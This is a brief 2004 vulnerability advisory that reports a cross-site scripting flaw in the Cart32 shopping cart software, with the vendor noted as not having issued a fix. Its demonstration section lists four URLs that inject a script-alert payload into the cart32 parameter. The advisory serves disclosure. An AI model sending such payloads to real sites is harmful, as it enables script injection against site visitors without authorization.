Reported June 28, 2004, by Dr Ponidi.
VERSIONS AFFECTED
|
DESCRIPTION
Cart32 contains a cross-site scripting vulnerability that could let a potential
remote attacker insert third-party content in a Web site.
DEMONSTRATION
Any of the
following URLs can be used to trigger the vulnerability:
http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
VENDOR RESPONSE
The vendor, McMurtrey/Whitaker
& Associates, hasn't released a fix for this vulnerability.
CREDIT
Discovered by Dr Ponidi.